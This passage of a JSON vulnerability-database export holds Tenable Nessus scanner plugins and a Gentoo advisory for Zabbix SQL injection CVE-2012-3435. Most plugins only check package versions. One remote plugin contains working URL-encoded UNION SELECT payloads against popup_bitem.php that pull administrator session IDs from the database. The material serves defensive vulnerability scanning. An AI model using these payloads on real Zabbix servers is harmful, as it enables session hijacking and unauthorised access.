value:\"https://packages.debian.org/source/squeeze/zabbix\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2539\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the zabbix packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:1.8.2-1squeeze4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Zabbix 2.0 SQL Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:zabbix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/09/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/09/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"zabbix-agent\", reference:\"1:1.8.2-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"zabbix-frontend-php\", reference:\"1:1.8.2-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"zabbix-proxy-mysql\", reference:\"1:1.8.2-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"zabbix-proxy-pgsql\", reference:\"1:1.8.2-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"zabbix-server-mysql\", reference:\"1:1.8.2-1squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"zabbix-server-pgsql\", reference:\"1:1.8.2-1squeeze4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:58", "description": "Release notes: http://www.zabbix.com/rn1.8.15.php\n\nAmongst others :\n\n - Solves SQL injection vulnerability CVE-2012-3435\n\n - Removes useless backup files from the frontend\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "published": "2012-08-31T00:00:00", "title": "Fedora 17 : zabbix-1.8.15-1.fc17 (2012-12496)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3435"], "modified": "2012-08-31T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:zabbix", "cpe:/o:fedoraproject:fedora:17"], "id": "FEDORA_2012-12496.NASL", "href": "https://www.tenable.com/plugins/nessus/61737", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-12496.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61737);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(54661);\n script_xref(name:\"FEDORA\", value:\"2012-12496\");\n\n script_name(english:\"Fedora 17 : zabbix-1.8.15-1.fc17 (2012-12496)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Release notes: http://www.zabbix.com/rn1.8.15.php\n\nAmongst others :\n\n - Solves SQL injection vulnerability CVE-2012-3435\n\n - Removes useless backup files from the frontend\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.zabbix.com/rn1.8.15.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.zabbix.com/rn/rn1.8.15\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=843927\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-August/085844.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?93d12d79\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zabbix package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Zabbix 2.0 SQL Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zabbix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/08/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"zabbix-1.8.15-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zabbix\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:49:22", "description": "The remote web server hosts a version of the Zabbix web interface that\nis affected by a SQL injection vulnerability. The vulnerability exists\nin the 'popup_bitem.php' script, which fails to properly sanitize\nuser-supplied input to the 'itemid' parameter before using it in\ndatabase queries. This could allow an attacker to manipulate such\nqueries, resulting in manipulation or disclosure of arbitrary data.", "edition": 26, "published": "2012-10-30T00:00:00", "title": "Zabbix Web Interface popup_bitem.php itemid Parameter SQL Injection", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3435"], "modified": "2012-10-30T00:00:00", "cpe": ["cpe:/a:zabbix:zabbix"], "id": "ZABBIX_FRONTEND_ITEMID_SQLI.NASL", "href": "https://www.tenable.com/plugins/nessus/62757", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(62757);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-3435\");\n script_bugtraq_id(54661);\n script_xref(name:\"EDB-ID\", value:\"20087\");\n\n script_name(english:\"Zabbix Web Interface popup_bitem.php itemid Parameter SQL Injection\");\n script_summary(english:\"Tries to gather session id from the database\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is prone to a SQL\ninjection attack.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web server hosts a version of the Zabbix web interface that\nis affected by a SQL injection vulnerability. The vulnerability exists\nin the 'popup_bitem.php' script, which fails to properly sanitize\nuser-supplied input to the 'itemid' parameter before using it in\ndatabase queries. This could allow an attacker to manipulate such\nqueries, resulting in manipulation or disclosure of arbitrary data.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.zabbix.com/browse/ZBX-5348\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zabbix.com/rn/rn1.8.15rc1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zabbix.com/rn/rn2.0.2rc1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 1.8.15rc1 / 2.02rc1 / 2.1.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Zabbix 2.0 SQL Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zabbix:zabbix\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"zabbix_frontend_detect.nasl\");\n script_require_keys(\"www/zabbix\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"http.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(\n appname:\"zabbix\",\n port:port,\n exit_on_fail:TRUE\n);\n\ndir = install[\"dir\"];\nloc = build_url(port:port, qs:dir);\n\nsession = NULL;\n\nsql_attack = make_list(\n # 2.0.x branch\n \"1+union+select+1%2C1%2C1%2C1%2C1%2Cgroup_concat%28sessionid%29%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1+from+sessions+where+userid%3D%271%27%23&dstfrm=1\",\n # 1.8.x branch\n \"1+union+select+1%2C1%2C1%2C1%2C1%2C1%2Cgroup_concat%28sessionid%29%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1+from+sessions+where+userid%3D%271%27%23&dstfrm=1\"\n);\n\npat1 = 'name=\"caption\" value=\"(.+)\" size=|id=\"caption\" type=\"text\" size=\"32\" value=\"(.+)\" />';\npat2 = '(name=\"caption\"|size=\"[0-9]+\") value=\"([A-Za-z0-9,]+)\" (size=|/></td>)';\n\nforeach sqli (sql_attack)\n{\n url = \"/popup_bitem.php?itemid=\" + sqli;\n\n res = http_send_recv3(\n port : port,\n method : \"GET\",\n item : dir + url,\n exit_on_fail : TRUE\n );\n\n if (\n '<title>Graph item</title>' >< res[2] &&\n (\n '<meta name=\"Author\" content=\"Zabbix SIA\"' >< res[2] ||\n '<meta name=\"Author\" content=\"ZABBIX SIA\"' >< res[2]\n )\n )\n {\n matches = egrep(pattern:pat1, string:res[2]);\n if (matches)\n {\n foreach match (split(matches, keep:FALSE))\n {\n\titem = eregmatch(pattern:pat2, string:match);\n if (!isnull(item))\n {\n session = item[2];\n break;\n }\n }\n }\n }\n # No need to try alternate SQL statement if we succeed the first time\n if (session != NULL) break;\n}\n# Exit if we did not obtain a session using our SQLi attack\nif (session == NULL) audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Zabbix\", loc);\n\nset_kb_item(name:'www/'+port+'/SQLInjection', value:TRUE);\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus was able to verify the issue exists using the following request :' +\n '\\n' +\n '\\n' + loc + url +\n '\\n';\n\n if (report_verbosity >1)\n {\n report +=\n '\\n' + \"This produced the following session id : \" + session +\n '\\n';\n }\n security_hole(port:port, extra:report);\n exit(0);\n}\nelse security_hole(port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:55:19", "description": "The remote host is affected by the vulnerability described in GLSA-201311-15\n(Zabbix: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Zabbix. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary SQL statements, cause\n a Denial of Service condition, or obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2013-11-26T00:00:00", "title": "GLSA-201311-15 : Zabbix: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4674", "CVE-2013-1364", "CVE-2010-1277", "CVE-2013-5572", "CVE-2011-3263", "CVE-2012-3435", "CVE-2011-2904"], "modified": "2013-11-26T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:zabbix"], "id": "GENTOO_GLSA-201311-15.NASL", "href": "https://www.tenable.com/plugins/nessus/71089", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201311-15.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(71089);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-1277\", \"CVE-2011-2904\", \"CVE-2011-3263\", \"CVE-2011-4674\", \"CVE-2012-3435\", \"CVE-2013-1364\", \"CVE-2013-5572\");\n script_bugtraq_id(39148, 49016, 50803, 54661, 57471, 62648);\n script_xref(name:\"GLSA\", value:\"201311-15\");\n\n script_name(english:\"GLSA-201311-15 : Zabbix: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201311-15\n(Zabbix: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Zabbix. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker may be able to execute arbitrary SQL statements, cause\n a Denial of Service condition, or obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201311-15\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Zabbix users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=net-analyzer/zabbix-2.0.9_rc1-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Zabbix <= 1.8.4 SQL Injection\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:zabbix\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/04/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/11/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/zabbix\", unaffected:make_list(\"ge 2.0.9_rc1-r2\"), vulnerable:make_list(\"lt 2.0.9_rc1-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Zabbix\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:46", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4674", "CVE-2013-1364", "CVE-2010-1277", "CVE-2013-5572", "CVE-2011-3263", "CVE-2012-3435", "CVE-2011-2904"], "edition": 1, "description": "### Background\n\nZabbix is software for monitoring applications, networks, and servers.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Zabbix. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker may be able to execute arbitrary SQL statements, cause a Denial of Service condition, or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Zabbix users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=net-analyzer/zabbix-2.0.9_rc1-r2\"", "modified": "2013-11-25T00:00:00", "published": "2013-11-25T00:00:00", "id": "GLSA-201311-15", "href": "https://security.gentoo.org/glsa/201311-15", "type": "gentoo", "title": "Zabbix: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}